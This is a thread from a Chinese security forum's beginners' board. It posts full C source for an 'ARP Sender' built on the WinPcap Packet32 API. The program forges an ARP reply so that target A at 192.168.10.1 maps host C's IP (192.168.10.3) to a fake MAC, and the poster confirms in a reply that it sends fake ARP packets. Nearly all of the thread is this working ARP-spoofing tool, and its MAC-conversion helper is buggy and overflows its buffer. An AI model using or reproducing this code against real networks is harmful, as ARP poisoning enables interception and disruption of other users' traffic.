论坛: 菜鸟乐园 标题: 源代码 复制本贴地址    
作者: dfrog [dfrog]    论坛用户   登录
///////////////////////////////////////////////////////////////////////////////
//
//                ARP Sender
//
//          Creator:    Refdom
//          Email:      refdom@263.net
//          Home Page:  www.opengram.com
//
//          2002/4/7
//
////////////////////////////////////////////////////////////////////////////////

#include "stdafx.h"
//#include "Mac.h"    //GetMacAddr(),我写的把字符串转换为MAC地址的函数,就不列在这里了
#include <stdio.h>
#include <Packet32.h>

#define EPT_IP        0x0800            /* type: IP    */
#define EPT_ARP        0x0806            /* type: ARP */
#define EPT_RARP    0x8035            /* type: RARP */
#define ARP_HARDWARE 0x0001            /* Dummy type for 802.3 frames  */
#define    ARP_REQUEST    0x0001            /* ARP request */
#define    ARP_REPLY    0x0002            /* ARP reply */

#define Max_Num_Adapter 10

#pragma pack(push, 1)

typedef struct ehhdr
{
    unsigned char    eh_dst[6];        /* destination ethernet addrress */
    unsigned char    eh_src[6];        /* source ethernet addresss */
    unsigned short    eh_type;        /* ethernet pachet type    */
}EHHDR, *PEHHDR;


typedef struct arphdr
{
    unsigned short    arp_hrd;            /* format of hardware address */
    unsigned short    arp_pro;            /* format of protocol address */
    unsigned char    arp_hln;            /* length of hardware address */
    unsigned char    arp_pln;            /* length of protocol address */
    unsigned short    arp_op;                /* ARP/RARP operation */

    unsigned char    arp_sha[6];            /* sender hardware address */
    unsigned long    arp_spa;            /* sender protocol address */
    unsigned char    arp_tha[6];            /* target hardware address */
    unsigned long    arp_tpa;            /* target protocol address */
}ARPHDR, *PARPHDR;

typedef struct arpPacket
{
    EHHDR    ehhdr;
    ARPHDR    arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)


int GetMacAddr(char *s_str,char *p)
{
int i;
for (i=1;i<6;i++)
{
//printf ("%c",*s_str);
*p=*s_str;
*p++;
*s_str++;
*p=*s_str;
*p++;
*s_str++;
*p='-';
*p++;
}
*p=*s_str;
*p++;
*s_str++;
*p=*s_str;
return 1;


}

int main(int argc, char* argv[])
{
    static char AdapterList[Max_Num_Adapter][1024];   
    char szPacketBuf[600];
    char MacAddr[6];

    LPADAPTER    lpAdapter;
    LPPACKET    lpPacket;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1;
    ARPPACKET ARPPacket;

    ULONG AdapterLength = 1024;
   
    int AdapterNum = 0;
    int nRetCode, i;

    //Get The list of Adapter
    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }

    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            memcpy(AdapterList[i],temp1,(temp-temp1)*2);
            temp1=temp+1;
            i++;
        }
       
        temp++;
    }
   
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
        wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
    printf("\n");
   
    //Default open the 0
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]);
        //取第一个网卡(假设啦)

    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        return 0;
    }

    ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

 
    if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))
    {
        printf ("Get Mac address error!\n");
    }
   
    memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);    //源MAC地址

   
    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf ("Get Mac address error!\n");
        return 0;
    }
   
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);    //目的MAC地址。(A的地址)

    ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

    if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))
    {
        printf ("Get Mac address error!\n");
        return 0;
    }
   
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);    //伪造的C的MAC地址
    ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3");  //C的IP地址

    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf ("Get Mac address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6);  //目标A的MAC地址
    ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1");  //目标A的IP地址

    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));
    PacketInitPacket(lpPacket, szPacketBuf, 60);

    if(PacketSetNumWrites(lpAdapter, 2)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
   
    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf("Error sending the packets!\n");
        return 0;
    }

    printf ("Send ok!\n");

    // close the adapter and exit
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}


地主 发表时间: 12/03 20:37
回复: lida1818 [lida1818]   论坛用户   登录



[此贴被 烟雨平生(lida1818) 在 12月03日21时18分 编辑过]

B1层 发表时间: 12/03 20:57
回复: dfrog [dfrog]   论坛用户   登录
呵呵 是发送虚假arp包 呵呵

B2层 发表时间: 12/03 21:01

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号